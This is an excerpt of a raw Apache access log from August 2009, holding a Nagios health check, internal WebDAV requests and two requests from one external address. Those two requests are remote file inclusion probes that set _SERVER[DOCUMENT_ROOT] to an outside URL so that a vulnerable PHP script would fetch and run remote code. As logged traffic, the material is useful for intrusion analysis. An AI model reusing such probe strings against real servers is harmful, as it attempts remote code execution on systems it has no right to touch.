209.59.12.99 - - [05/Aug/2009:08:26:53 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
172.16.1.170 - - [05/Aug/2009:08:27:01 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.170 - - [05/Aug/2009:08:27:01 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.170 - - [05/Aug/2009:08:27:01 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
213.171.225.234 - - [05/Aug/2009:08:27:02 -0400] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://www.medisite.fr/id??? HTTP/1.1" 200 12406 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;"
213.171.225.234 - - [05/Aug/2009:08:27:02 -0400] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.medisite.fr/id??? HTTP/1.1" 200 409 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;"
172.16.1.176 - - [05/Aug/2009:08:27:12 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.176 - - [05/Aug/2009:08:27:12 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
